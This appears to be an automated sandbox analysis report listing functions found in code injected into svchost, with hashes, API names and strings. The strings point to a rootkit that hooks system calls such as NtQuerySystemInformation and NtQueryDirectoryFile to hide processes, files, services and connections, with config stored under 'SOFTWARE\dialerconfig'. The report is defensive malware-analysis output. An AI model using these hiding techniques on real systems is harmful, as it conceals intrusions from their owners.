                                                • API String ID: 3140674995-0
                                                • Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                • Instruction ID: 3860ca3a9ccc4f61de5fab1c6314edb5ee6f2e5bc74b540e0860344737e3c341
                                                • Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                • Instruction Fuzzy Hash: 98315D72204F9096EB60CFA0E8447EE73A4F784789F44542ADA4D47B99EF38C648C714
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001E.00000002.2929982709.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_30_2_25306e60000_svchost.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                • String ID:
                                                • API String ID: 1239891234-0
                                                • Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                • Instruction ID: c2c13218c38687dcfdc11253ecaceb8b1c89b9e748cfc14e941e563b52236888
                                                • Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                • Instruction Fuzzy Hash: 8631BC32214F9086EB60CF64EC4839E73A4F7887D9F501126EA9D47BA9EF38C655CB04
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001E.00000002.2929982709.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_30_2_25306e60000_svchost.jbxd
                                                Similarity
                                                • API ID: ErrorFileLastWrite$ConsoleOutput
                                                • String ID:
                                                • API String ID: 1443284424-0
                                                • Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                • Instruction ID: 6e2a37bc13749d6f93b8863db0506f35e17443190fa809c6a389f22584975dec
                                                • Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                • Instruction Fuzzy Hash: CDE121B2714BA09AE700CFA4DA882DE7BB1F3457C9F106116EE4A57BDDDA34C61AC704

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001E.00000002.2929982709.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_30_2_25306e60000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                • API String ID: 106492572-2879589442
                                                • Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                • Instruction ID: 1ca94f53232ef8e48d711fb1114ee597262955cfd922d9b6dab6240cd3b83986
                                                • Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                • Instruction Fuzzy Hash: 44710936310F6085EB50DFA9ED5869E27A5F785BCAF002121EA4D47AACEF38C644D308

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001E.00000002.2929982709.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_30_2_25306e60000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                • String ID: d
                                                • API String ID: 2005889112-2564639436
                                                • Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                • Instruction ID: ea4cb44b8d4bc1762c3c9b222dcaff4fb0d6d3fdd8569e23f7a8df9a4e3e2995
                                                • Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                • Instruction Fuzzy Hash: D6519E72204F94D3EB54CFA6EA4839AB7A1F788BC5F049124DB4907B98DF38C25AC704

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001E.00000002.2929982709.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_30_2_25306e60000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentThread$AddressHandleModuleProc
                                                • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                • API String ID: 4175298099-1975688563
                                                • Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                • Instruction ID: f8434084b60d2490b86668ea946a91a06060f361aa750efe63ceeef58b7f8a35
                                                • Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                • Instruction Fuzzy Hash: 9831A274210F6AA4FA04EFE8EF596D92721B7543C7F807423A6191B1ED9E39835DC388

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001E.00000002.2929982709.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_30_2_25306e60000_svchost.jbxd
                                                Similarity
                                                • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                • API String ID: 2171963597-1373409510
                                                • Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                • Instruction ID: 4b9723d83ffef661a2df1093bac8626c59532c343e3a3266cd6f49c48f56047a
                                                • Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                • Instruction Fuzzy Hash: 0A214936614B5083FB10CB65EA4835A77A0F389BE6F505215EA5943BECDF7CC249CB04

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001E.00000002.2929982709.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_30_2_25306e60000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                • String ID: d
                                                • API String ID: 3743429067-2564639436
                                                • Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                • Instruction ID: 3eb227a90dd505873f50682121a590a1dd474164894a6c42467e29c58437e9ca
                                                • Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                • Instruction Fuzzy Hash: A6417233214B90D7E761CF95E94879AB7A1F3887C5F008125EB8907B98DF38D268CB04

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 322 253067d69f0-253067d69f6 323 253067d6a31-253067d6a3b 322->323 324 253067d69f8-253067d69fb 322->324 325 253067d6b58-253067d6b6d 323->325 326 253067d69fd-253067d6a00 324->326 327 253067d6a25-253067d6a64 call 253067d70a0 324->327 331 253067d6b6f 325->331 332 253067d6b7c-253067d6b96 call 253067d6f34 325->332 329 253067d6a02-253067d6a05 326->329 330 253067d6a18 __scrt_dllmain_crt_thread_attach 326->330 345 253067d6b32 327->345 346 253067d6a6a-253067d6a7f call 253067d6f34 327->346 337 253067d6a11-253067d6a16 call 253067d6fe4 329->337 338 253067d6a07-253067d6a10 329->338 335 253067d6a1d-253067d6a24 330->335 333 253067d6b71-253067d6b7b 331->333 343 253067d6bcf-253067d6c00 call 253067d7270 332->343 344 253067d6b98-253067d6bcd call 253067d705c call 253067d6efc call 253067d73f8 call 253067d7210 call 253067d7234 call 253067d708c 332->344 337->335 354 253067d6c02-253067d6c08 343->354 355 253067d6c11-253067d6c17 343->355 344->333 349 253067d6b34-253067d6b49 345->349 357 253067d6b4a-253067d6b57 call 253067d7270 346->357 358 253067d6a85-253067d6a96 call 253067d6fa4 346->358 354->355 359 253067d6c0a-253067d6c0c 354->359 360 253067d6c5e-253067d6c74 call 253067d2858 355->360 361 253067d6c19-253067d6c23 355->361 357->325 372 253067d6a98-253067d6abc call 253067d73bc call 253067d6eec call 253067d6f18 call 253067d90dc 358->372 373 253067d6ae7-253067d6af1 call 253067d7210 358->373 366 253067d6cff-253067d6d0c 359->366 379 253067d6cac-253067d6cae 360->379 380 253067d6c76-253067d6c78 360->380 367 253067d6c2f-253067d6c3d call 253067e2758 361->367 368 253067d6c25-253067d6c2d 361->368 375 253067d6c43-253067d6c58 call 253067d69f0 367->375 389 253067d6cf5-253067d6cfd 367->389 368->375 372->373 425 253067d6abe-253067d6ac5 __scrt_dllmain_after_initialize_c 372->425 373->345 393 253067d6af3-253067d6aff call 253067d7260 373->393 375->360 375->389 387 253067d6cb0-253067d6cb3 379->387 388 253067d6cb5-253067d6cca call 253067d69f0 379->388 380->379 386 253067d6c7a-253067d6c9c call 253067d2858 call 253067d6b58 380->386 386->379 419 253067d6c9e-253067d6ca6 call 253067e2758 386->419 387->388 387->389 388->389 407 253067d6ccc-253067d6cd6 388->407 389->366 412 253067d6b01-253067d6b0b call 253067d7178 393->412 413 253067d6b25-253067d6b30 393->413 409 253067d6ce1-253067d6cf1 call 253067e2758 407->409 410 253067d6cd8-253067d6cdf 407->410 409->389 410->389 412->413 424 253067d6b0d-253067d6b1b 412->424 413->349 419->379 424->413 425->373 426 253067d6ac7-253067d6ae4 call 253067d9078 425->426 426->373
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001E.00000002.2922053570.00000253067D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000253067D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_30_2_253067d0000_svchost.jbxd
                                                Similarity
                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                • String ID:
                                                • API String ID: 190073905-0
                                                • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                • Instruction ID: 4e1eca3a14f57ae1b44fa47283abdcc15747a8110826826dcac1c97b97d2998a
                                                • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                • Instruction Fuzzy Hash: A081E221600FB186FA54EB259C4937923B0E789FC2F547925AA58C77DFDB38CB498708

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 429 25306e675f0-25306e675f6 430 25306e675f8-25306e675fb 429->430 431 25306e67631-25306e6763b 429->431 432 25306e67625-25306e67664 call 25306e67ca0 430->432 433 25306e675fd-25306e67600 430->433 434 25306e67758-25306e6776d 431->434 452 25306e6766a-25306e6767f call 25306e67b34 432->452 453 25306e67732 432->453 435 25306e67618 __scrt_dllmain_crt_thread_attach 433->435 436 25306e67602-25306e67605 433->436 437 25306e6776f 434->437 438 25306e6777c-25306e67796 call 25306e67b34 434->438 444 25306e6761d-25306e67624 435->444 440 25306e67607-25306e67610 436->440 441 25306e67611-25306e67616 call 25306e67be4 436->441 442 25306e67771-25306e6777b 437->442 450 25306e67798-25306e677cd call 25306e67c5c call 25306e67afc call 25306e67ff8 call 25306e67e10 call 25306e67e34 call 25306e67c8c 438->450 451 25306e677cf-25306e67800 call 25306e67e70 438->451 441->444 450->442 463 25306e67811-25306e67817 451->463 464 25306e67802-25306e67808 451->464 461 25306e6774a-25306e67757 call 25306e67e70 452->461 462 25306e67685-25306e67696 call 25306e67ba4 452->462 457 25306e67734-25306e67749 453->457 461->434 479 25306e676e7-25306e676f1 call 25306e67e10 462->479 480 25306e67698-25306e676bc call 25306e67fbc call 25306e67aec call 25306e67b18 call 25306e69cdc 462->480 469 25306e67819-25306e67823 463->469 470 25306e6785e-25306e67874 call 25306e63458 463->470 464->463 468 25306e6780a-25306e6780c 464->468 475 25306e678ff-25306e6790c 468->475 476 25306e67825-25306e6782d 469->476 477 25306e6782f-25306e6783d call 25306e73358 469->477 490 25306e67876-25306e67878 470->490 491 25306e678ac-25306e678ae 470->491 482 25306e67843-25306e67858 call 25306e675f0 476->482 477->482 494 25306e678f5-25306e678fd 477->494 479->453 502 25306e676f3-25306e676ff call 25306e67e60 479->502 480->479 532 25306e676be-25306e676c5 __scrt_dllmain_after_initialize_c 480->532 482->470 482->494 490->491 499 25306e6787a-25306e6789c call 25306e63458 call 25306e67758 490->499 492 25306e678b5-25306e678ca call 25306e675f0 491->492 493 25306e678b0-25306e678b3 491->493 492->494 511 25306e678cc-25306e678d6 492->511 493->492 493->494 494->475 499->491 526 25306e6789e-25306e678a6 call 25306e73358 499->526 519 25306e67725-25306e67730 502->519 520 25306e67701-25306e6770b call 25306e67d78 502->520 516 25306e678d8-25306e678df 511->516 517 25306e678e1-25306e678f1 call 25306e73358 511->517 516->494 517->494 519->457 520->519 531 25306e6770d-25306e6771b 520->531 526->491 531->519 532->479 533 25306e676c7-25306e676e4 call 25306e69c78 532->533 533->479
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001E.00000002.2929982709.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_30_2_25306e60000_svchost.jbxd
                                                Similarity
                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                • String ID:
                                                • API String ID: 190073905-0
                                                • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                • Instruction ID: 46a3f7955dd0718d26c4c5b575450434584877d29b7e551ed17222307919b4d6
                                                • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                • Instruction Fuzzy Hash: 8B81CD30710F7186FE50EBE99E4C39A2290AB457CAF047125BA09477EEDB38CB41C708

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 536 25306e69804-25306e69842 537 25306e69848-25306e6984b 536->537 538 25306e69933 536->538 539 25306e69935-25306e69951 537->539 540 25306e69851 537->540 538->539 541 25306e69854 540->541 542 25306e6985a-25306e69869 541->542 543 25306e6992b 541->543 544 25306e69876-25306e69895 LoadLibraryExW 542->544 545 25306e6986b-25306e6986e 542->545 543->538 548 25306e69897-25306e698a0 call 25306e73080 544->548 549 25306e698ed-25306e69902 544->549 546 25306e69874 545->546 547 25306e6990d-25306e6991c call 25306e73090 545->547 551 25306e698e1-25306e698e8 546->551 547->543 556 25306e6991e-25306e69929 547->556 557 25306e698a2-25306e698b7 call 25306e6ad28 548->557 558 25306e698cf-25306e698d9 548->558 549->547 553 25306e69904-25306e69907 FreeLibrary 549->553 551->541 553->547 556->539 557->558 561 25306e698b9-25306e698cd LoadLibraryExW 557->561 558->551 561->549 561->558
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001E.00000002.2929982709.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_30_2_25306e60000_svchost.jbxd
                                                Similarity
                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                • String ID: api-ms-
                                                • API String ID: 2559590344-2084034818
                                                • Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                • Instruction ID: 702610bec8e7a65bbd8d4d06c48433f054525fb93bb0180a477ced8a9b809bb6
                                                • Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                • Instruction Fuzzy Hash: 3D310331202F6195EE51DF92AE087996394BB08BE6F092525FD2D4B3D9EF38C244C308

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001E.00000002.2929982709.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_30_2_25306e60000_svchost.jbxd
                                                Similarity
                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                • String ID: CONOUT$
                                                • API String ID: 3230265001-3130406586
                                                • Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                • Instruction ID: b58e3b165d099d1b7975f85f89b3e99003cf41f4ba852fc3f395b3dab0e66951
                                                • Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                • Instruction Fuzzy Hash: FC116D21314F6086E790CB96ED5831A77A0FB98FE6F145224EA5D877D8DF78CA04C748
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001E.00000002.2929982709.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_30_2_25306e60000_svchost.jbxd
                                                Similarity
                                                • API ID: Thread$Current$Context
                                                • String ID:
                                                • API String ID: 1666949209-0
                                                • Opcode ID: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
                                                • Instruction ID: aaf0407f03c20954f3603b35a4714f407628f89e6976bb78a0326656dfb50811
                                                • Opcode Fuzzy Hash: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
                                                • Instruction Fuzzy Hash: 45D18C76208F9881DA70DB59E99835A77A0F7C8BC9F105216EA8D47BE9DF38C641CB04
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001E.00000002.2929982709.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_30_2_25306e60000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$Process$AllocFree
                                                • String ID: dialer
                                                • API String ID: 756756679-3528709123
                                                • Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                • Instruction ID: 06783d0b336c43b6fb8f3cf0e459f23948a40912d03ff5635ea17d9edfbdb44c
                                                • Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                • Instruction Fuzzy Hash: 1F31A831701F7582EB55DF96AE4826A67A0FB447C6F046020AF4907BD9EF38C6A9C708
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001E.00000002.2929982709.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_30_2_25306e60000_svchost.jbxd
                                                Similarity
                                                • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                • String ID:
                                                • API String ID: 517849248-0
                                                • Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                • Instruction ID: 5f443a769d04d3adea556802eead3f678b55cddfadf8d773dddeaacf41c16662
                                                • Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                • Instruction Fuzzy Hash: 62018031300F5196EB50DB92A95C75A63A1F788FC2F484435DE8943798DE3CCA89C344
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001E.00000002.2929982709.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_30_2_25306e60000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                • String ID:
                                                • API String ID: 449555515-0
                                                • Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                                • Instruction ID: 67865cf5ecda3e0ef2d77b708ba637a20954f1de08da6915a074c77a6b1aed6c
                                                • Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                                • Instruction Fuzzy Hash: F4111775611F6086FB64DBA1ED0D75A67A0BB58BC7F042428DA494B7E9EF3CC608C708
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001E.00000002.2929982709.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_30_2_25306e60000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                • String ID: csm$f
                                                • API String ID: 2395640692-629598281
                                                • Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                • Instruction ID: 6fd9f1269f41fee45237cbde930d02143bfb5252efbf0107178b4952620fd5d9
                                                • Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                • Instruction Fuzzy Hash: B151C132311B228BEB54CF95EA4CB593799F344BCAF51A120EA16477CEDB35CA45C708
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001E.00000002.2929982709.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_30_2_25306e60000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                • String ID: csm$f
                                                • API String ID: 2395640692-629598281
                                                • Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                • Instruction ID: 99e5b11989131456094ae1b2b7497338fd034adba382cd73036ced72e1ece174
                                                • Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                • Instruction Fuzzy Hash: A631AF32210BA196E714DF91ED4C71A37A9F744BCAF16A114BE5A077CEDB38CA45C708
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001E.00000002.2929982709.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_30_2_25306e60000_svchost.jbxd
                                                Similarity
                                                • API ID: FinalHandleNamePathlstrlen
                                                • String ID: \\?\
                                                • API String ID: 2719912262-4282027825
                                                • Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                                • Instruction ID: 1b038f0142236a24ced6044ad0faef4b883290b9e58a8ed610a7110b3a25747f
                                                • Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                                • Instruction Fuzzy Hash: 8CF03132304B5192E760CBA5FA9839A6761F744BC9F849020DA4947A9CEE3DC748C704
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001E.00000002.2929982709.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_30_2_25306e60000_svchost.jbxd
                                                Similarity
                                                • API ID: CombinePath
                                                • String ID: \\.\pipe\
                                                • API String ID: 3422762182-91387939
                                                • Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                                • Instruction ID: c9fb27bfcac6e99e8fd94bc9e368736ec2bf4c7c393eae6b54a4519cfa6ad413
                                                • Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                                • Instruction Fuzzy Hash: 7BF08224304FA191EA50CB93BF0C11A6221EB48FD2F08A131EE5A07BADDE3CC641C348
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001E.00000002.2929982709.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_30_2_25306e60000_svchost.jbxd
                                                Similarity
                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                • String ID: CorExitProcess$mscoree.dll
                                                • API String ID: 4061214504-1276376045
                                                • Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                                • Instruction ID: da9a998cbc01b6656b8c920cb7f41de219c896e05435d306a2f840f05e45208c
                                                • Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                                • Instruction Fuzzy Hash: CEF012A1711F5491EF94CBE4ED8C36627A0AB48BD2F443029A51B475E8DF38C68CD708
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001E.00000002.2929982709.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_30_2_25306e60000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentThread
                                                • String ID:
                                                • API String ID: 2882836952-0
                                                • Opcode ID: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
                                                • Instruction ID: 5c726715d9ad476fa7ebe1cdcd0cb63686d4be01401ca58cd6bd6853f82b4a4a
                                                • Opcode Fuzzy Hash: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
                                                • Instruction Fuzzy Hash: A302C732219B9086EB60CB95E99835AB7A0F3C5BD5F105115FA8E87BACDF7CC584CB04
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001E.00000002.2929982709.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_30_2_25306e60000_svchost.jbxd
                                                Similarity
                                                • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                • String ID:
                                                • API String ID: 2210144848-0
                                                • Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                • Instruction ID: c07e3fbccd39fb9f6d1ac549793f1d58a0b0bce9570af4ff920596f5c891eacf
                                                • Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                • Instruction Fuzzy Hash: 0181D0B2610F7089FB50DBE1DE483AE27A0F754BCAF446116EE0A937D9DB348641C318
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001E.00000002.2929982709.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_30_2_25306e60000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentThread
                                                • String ID:
                                                • API String ID: 2882836952-0
                                                • Opcode ID: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
                                                • Instruction ID: 8bd7cdf491045c013809163f324ed5bb684671d1bf3b00075ecc160aad20f4e1
                                                • Opcode Fuzzy Hash: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
                                                • Instruction Fuzzy Hash: FB61A776619F50C6E760CB95E95831AB7A0F7887D9F102125FA8D87BE8DB7CC640CB08
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001E.00000002.2922053570.00000253067D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000253067D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_30_2_253067d0000_svchost.jbxd
                                                Similarity
                                                • API ID: _set_statfp
                                                • String ID:
                                                • API String ID: 1156100317-0
                                                • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                • Instruction ID: 682786c9599d37d828d4b02738237e7320176018a7bf599af2c74a88741e04dd
                                                • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                • Instruction Fuzzy Hash: CC11A322A94F2001F6649175EC5F37D11406B5DBF6FC86634AA76C6BDFCA388E49410C
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001E.00000002.2929982709.0000025306E60000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025306E60000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_30_2_25306e60000_svchost.jbxd
                                                Similarity
                                                • API ID: _set_statfp
                                                • String ID:
                                                • API String ID: 1156100317-0
                                                • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                • Instruction ID: 941447935e385e845102139b8ddcc0030948a823b7a2d3c3dbc15d29efe9af80
                                                • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
